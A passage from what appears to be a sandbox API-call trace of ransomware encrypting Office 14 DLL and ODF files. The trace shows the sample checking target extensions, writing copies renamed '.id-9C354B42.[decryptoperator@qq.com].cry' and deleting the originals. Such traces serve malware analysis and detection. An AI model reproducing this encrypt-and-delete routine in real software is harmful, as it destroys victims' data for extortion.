Shared\\OFFICE14\\ACETXT.DLL") returned 66 [0054.355] lstrlenW (lpString=".doc") returned 4 [0054.356] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.356] lstrlenW (lpString=".docx") returned 5 [0054.356] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1 [0054.356] lstrlenW (lpString=".pdf") returned 4 [0054.356] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.356] lstrlenW (lpString=".xls") returned 4 [0054.356] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.356] lstrlenW (lpString=".xlsx") returned 5 [0054.356] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1 [0054.356] lstrlenW (lpString=".ppt") returned 4 [0054.356] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.356] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66 [0054.356] lstrlenW (lpString=".zip") returned 4 [0054.356] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.356] lstrlenW (lpString=".rar") returned 4 [0054.356] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.356] lstrlenW (lpString=".bz2") returned 4 [0054.356] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.356] lstrlenW (lpString=".7z") returned 3 [0054.356] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.356] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66 [0054.356] lstrlenW (lpString=".dbf") returned 4 [0054.356] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.356] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66 [0054.356] lstrlenW (lpString=".1cd") returned 4 [0054.356] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.356] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66 [0054.356] lstrlenW (lpString=".jpg") returned 4 [0054.356] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.356] lstrcmpiW (lpString1=".DLL", lpString2=".cry") returned 1 [0054.356] lstrlenW (lpString="ACEXBE.DLL") returned 10 [0054.356] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acexbe.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0054.358] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=502168) returned 1 [0054.358] CloseHandle (hObject=0x20c) returned 1 [0054.358] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acexbe.dll")) returned 0x20 [0054.358] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acexbe.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0054.358] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acexbe.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0054.358] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.358] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.358] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acexbe.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0054.391] GetLastError () returned 0x0 [0054.391] ReadFile (in: hFile=0x20c, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0x7a998, lpOverlapped=0x0) returned 1 [0054.580] WriteFile (in: hFile=0x230, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0x7a9a0, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0x7a9a0, lpOverlapped=0x0) returned 1 [0054.588] ReadFile (in: hFile=0x20c, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.588] WriteFile (in: hFile=0x230, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0054.588] SetEndOfFile (hFile=0x230) returned 1 [0054.593] CloseHandle (hObject=0x230) returned 1 [0054.593] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.593] SetEndOfFile (hFile=0x20c) returned 1 [0054.607] CloseHandle (hObject=0x20c) returned 1 [0054.607] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0054.607] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acexbe.dll")) returned 1 [0054.607] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL") returned 66 [0054.607] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL") returned 66 [0054.607] lstrlenW (lpString=".doc") returned 4 [0054.607] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.607] lstrlenW (lpString=".docx") returned 5 [0054.607] lstrcmpiW (lpString1=".docx", lpString2="E.DLL") returned -1 [0054.607] lstrlenW (lpString=".pdf") returned 4 [0054.607] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.607] lstrlenW (lpString=".xls") returned 4 [0054.607] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.607] lstrlenW (lpString=".xlsx") returned 5 [0054.607] lstrcmpiW (lpString1=".xlsx", lpString2="E.DLL") returned -1 [0054.607] lstrlenW (lpString=".ppt") returned 4 [0054.607] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.607] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL") returned 66 [0054.607] lstrlenW (lpString=".zip") returned 4 [0054.608] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.608] lstrlenW (lpString=".rar") returned 4 [0054.608] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.608] lstrlenW (lpString=".bz2") returned 4 [0054.608] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.608] lstrlenW (lpString=".7z") returned 3 [0054.608] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.608] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL") returned 66 [0054.608] lstrlenW (lpString=".dbf") returned 4 [0054.608] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.608] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL") returned 66 [0054.608] lstrlenW (lpString=".1cd") returned 4 [0054.608] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.608] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL") returned 66 [0054.608] lstrlenW (lpString=".jpg") returned 4 [0054.608] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.608] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL") returned 66 [0054.608] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL") returned 66 [0054.608] lstrlenW (lpString=".doc") returned 4 [0054.608] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.608] lstrlenW (lpString=".docx") returned 5 [0054.608] lstrcmpiW (lpString1=".docx", lpString2="E.DLL") returned -1 [0054.608] lstrlenW (lpString=".pdf") returned 4 [0054.608] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.608] lstrlenW (lpString=".xls") returned 4 [0054.608] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.608] lstrlenW (lpString=".xlsx") returned 5 [0054.609] lstrcmpiW (lpString1=".xlsx", lpString2="E.DLL") returned -1 [0054.609] lstrlenW (lpString=".ppt") returned 4 [0054.609] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.609] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL") returned 66 [0054.609] lstrlenW (lpString=".zip") returned 4 [0054.609] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.609] lstrlenW (lpString=".rar") returned 4 [0054.609] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.609] lstrlenW (lpString=".bz2") returned 4 [0054.609] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.609] lstrlenW (lpString=".7z") returned 3 [0054.609] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.609] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL") returned 66 [0054.609] lstrlenW (lpString=".dbf") returned 4 [0054.609] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.609] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL") returned 66 [0054.609] lstrlenW (lpString=".1cd") returned 4 [0054.609] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.609] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL") returned 66 [0054.609] lstrlenW (lpString=".jpg") returned 4 [0054.609] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.609] lstrcmpiW (lpString1=".ODF", lpString2=".cry") returned 1 [0054.609] lstrlenW (lpString="OFFICE.ODF") returned 10 [0054.609] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\cultures\\office.odf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0054.609] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=4297568) returned 1 [0054.609] CloseHandle (hObject=0x20c) returned 1 [0054.610] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\cultures\\office.odf")) returned 0x20 [0054.610] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\cultures\\office.odf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0054.610] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\cultures\\office.odf"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\cultures\\office.odf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0054.610] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\cultures\\office.odf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0054.610] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0054.611] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\cultures\\office.odf.id-9c354b42.[decryptoperator@qq.com].cry"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\cultures\\office.odf")) returned 1 [0054.613] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF") returned 75 [0054.614] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF") returned 75 [0054.616] lstrlenW (lpString=".doc") returned 4 [0054.617] lstrcmpiW (lpString1=".doc", lpString2=".ODF") returned -1 [0054.617] lstrlenW (lpString=".docx") returned 5 [0054.617] lstrcmpiW (lpString1=".docx", lpString2="E.ODF") returned -1 [0054.617] lstrlenW (lpString=".pdf") returned 4 [0054.617] lstrcmpiW (lpString1=".pdf", lpString2=".ODF") returned 1 [0054.617] lstrlenW (lpString=".xls") returned 4 [0054.617] lstrcmpiW (lpString1=".xls", lpString2=".ODF") returned 1 [0054.617] lstrlenW (lpString=".xlsx") returned 5 [0054.617] lstrcmpiW (lpString1=".xlsx", lpString2="E.ODF") returned -1 [0054.617] lstrlenW (lpString=".ppt") returned 4 [0054.617] lstrcmpiW (lpString1=".ppt", lpString2=".ODF") returned 1 [0054.617] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF") returned 75 [0054.617] lstrlenW (lpString=".zip") returned 4 [0054.617] lstrcmpiW (lpString1=".zip", lpString2=".ODF") returned 1 [0054.617] lstrlenW (lpString=".rar") returned 4 [0054.617] lstrcmpiW (lpString1=".rar", lpString2=".ODF") returned 1 [0054.617] lstrlenW (lpString=".bz2") returned 4 [0054.617] lstrcmpiW (lpString1=".bz2", lpString2=".ODF") returned -1 [0054.617] lstrlenW (lpString=".7z") returned 3 [0054.617] lstrcmpiW (lpString1=".7z", lpString2="ODF") returned -1 [0054.617] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF") returned 75 [0054.617] lstrlenW (lpString=".dbf") returned 4 [0054.617] lstrcmpiW (lpString1=".dbf", lpString2=".ODF") returned -1 [0054.617] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF") returned 75 [0054.617] lstrlenW (lpString=".1cd") returned 4 [0054.617] lstrcmpiW (lpString1=".1cd", lpString2=".ODF") returned -1 [0054.617] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF") returned 75 [0054.617] lstrlenW (lpString=".jpg") returned 4 [0054.617] lstrcmpiW (lpString1=".jpg", lpString2=".ODF") returned -1 [0054.617] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF") returned 75 [0054.617] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF") returned 75 [0054.617] lstrlenW (lpString=".doc") returned 4 [0054.617] lstrcmpiW (lpString1=".doc", lpString2=".ODF") returned -1 [0054.617] lstrlenW (lpString=".docx") returned 5 [0054.617] lstrcmpiW (lpString1=".docx", lpString2="E.ODF") returned -1 [0054.617] lstrlenW (lpString=".pdf") returned 4 [0054.617] lstrcmpiW (lpString1=".pdf", lpString2=".ODF") returned 1 [0054.618] lstrlenW (lpString=".xls") returned 4 [0054.618] lstrcmpiW (lpString1=".xls", lpString2=".ODF") returned 1 [0054.618] lstrlenW (lpString=".xlsx") returned 5 [0054.618] lstrcmpiW (lpString1=".xlsx", lpString2="E.ODF") returned -1 [0054.618] lstrlenW (lpString=".ppt") returned 4 [0054.618] lstrcmpiW (lpString1=".ppt", lpString2=".ODF") returned 1 [0054.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF") returned 75 [0054.618] lstrlenW (lpString=".zip") returned 4 [0054.618] lstrcmpiW (lpString1=".zip", lpString2=".ODF") returned 1 [0054.618] lstrlenW (lpString=".rar") returned 4 [0054.618] lstrcmpiW (lpString1=".rar", lpString2=".ODF") returned 1 [0054.618] lstrlenW (lpString=".bz2") returned 4 [0054.618] lstrcmpiW (lpString1=".bz2", lpString2=".ODF") returned -1 [0054.618] lstrlenW (lpString=".7z") returned 3 [0054.618] lstrcmpiW (lpString1=".7z", lpString2="ODF") returned -1 [0054.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF") returned 75 [0054.618] lstrlenW (lpString=".dbf") returned 4 [0054.618] lstrcmpiW (lpString1=".dbf", lpString2=".ODF") returned -1 [0054.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF") returned 75 [0054.618] lstrlenW (lpString=".1cd") returned 4 [0054.618] lstrcmpiW (lpString1=".1cd", lpString2=".ODF") returned -1 [0054.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF") returned 75 [0054.618] lstrlenW (lpString=".jpg") returned 4 [0054.618] lstrcmpiW (lpString1=".jpg", lpString2=".ODF") returned -1 [0054.618] lstrcmpiW (lpString1=".DLL", lpString2=".cry") returned 1 [0054.618] lstrlenW (lpString="EXPSRV.DLL") returned 10 [0054.618] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\expsrv.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0054.619] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=518984) returned 1 [0054.619] CloseHandle (hObject=0x20c) returned 1 [0054.619] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\expsrv.dll")) returned 0x20 [0054.619] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\expsrv.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0054.619] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\expsrv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0054.619] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.620] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.620] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\expsrv.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0054.621] GetLastError () returned 0x0 [0054.621] ReadFile (in: hFile=0x20c, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0x7eb48, lpOverlapped=0x0) returned 1 [0054.689] WriteFile (in: hFile=0x230, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0x7eb50, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0x7eb50, lpOverlapped=0x0) returned 1 [0054.699] ReadFile (in: hFile=0x20c, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.699] WriteFile (in: hFile=0x230, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0054.699] SetEndOfFile (hFile=0x230) returned 1 [0054.700] CloseHandle (hObject=0x230) returned 1 [0054.700] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.700] SetEndOfFile (hFile=0x20c) returned 1 [0054.711] CloseHandle (hObject=0x20c) returned 1 [0054.711] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0054.712] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\expsrv.dll")) returned 1 [0054.712] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL") returned 66 [0054.712] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL") returned 66 [0054.712] lstrlenW (lpString=".doc") returned 4 [0054.712] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.712] lstrlenW (lpString=".docx") returned 5 [0054.712] lstrcmpiW (lpString1=".docx", lpString2="V.DLL") returned -1 [0054.712] lstrlenW (lpString=".pdf") returned 4 [0054.712] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.712] lstrlenW (lpString=".xls") returned 4 [0054.712] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.712] lstrlenW (lpString=".xlsx") returned 5 [0054.712] lstrcmpiW (lpString1=".xlsx", lpString2="V.DLL") returned -1 [0054.712] lstrlenW (lpString=".ppt") returned 4 [0054.712] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.712] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL") returned 66 [0054.712] lstrlenW (lpString=".zip") returned 4 [0054.712] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.712] lstrlenW (lpString=".rar") returned 4 [0054.712] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.712] lstrlenW (lpString=".bz2") returned 4 [0054.712] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.712] lstrlenW (lpString=".7z") returned 3 [0054.713] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL") returned 66 [0054.713] lstrlenW (lpString=".dbf") returned 4 [0054.713] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL") returned 66 [0054.713] lstrlenW (lpString=".1cd") returned 4 [0054.713] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL") returned 66 [0054.713] lstrlenW (lpString=".jpg") returned 4 [0054.713] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL") returned 66 [0054.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL") returned 66 [0054.713] lstrlenW (lpString=".doc") returned 4 [0054.713] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.713] lstrlenW (lpString=".docx") returned 5 [0054.713] lstrcmpiW (lpString1=".docx", lpString2="V.DLL") returned -1 [0054.713] lstrlenW (lpString=".pdf") returned 4 [0054.713] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.713] lstrlenW (lpString=".xls") returned 4 [0054.713] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.713] lstrlenW (lpString=".xlsx") returned 5 [0054.713] lstrcmpiW (lpString1=".xlsx", lpString2="V.DLL") returned -1 [0054.713] lstrlenW (lpString=".ppt") returned 4 [0054.713] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL") returned 66 [0054.713] lstrlenW (lpString=".zip") returned 4 [0054.713] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.713] lstrlenW (lpString=".rar") returned 4 [0054.713] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.713] lstrlenW (lpString=".bz2") returned 4 [0054.713] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.713] lstrlenW (lpString=".7z") returned 3 [0054.713] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL") returned 66 [0054.713] lstrlenW (lpString=".dbf") returned 4 [0054.713] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL") returned 66 [0054.713] lstrlenW (lpString=".1cd") returned 4 [0054.714] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.714] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL") returned 66 [0054.714] lstrlenW (lpString=".jpg") returned 4 [0054.714] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.714] lstrcmpiW (lpString1=".DLL", 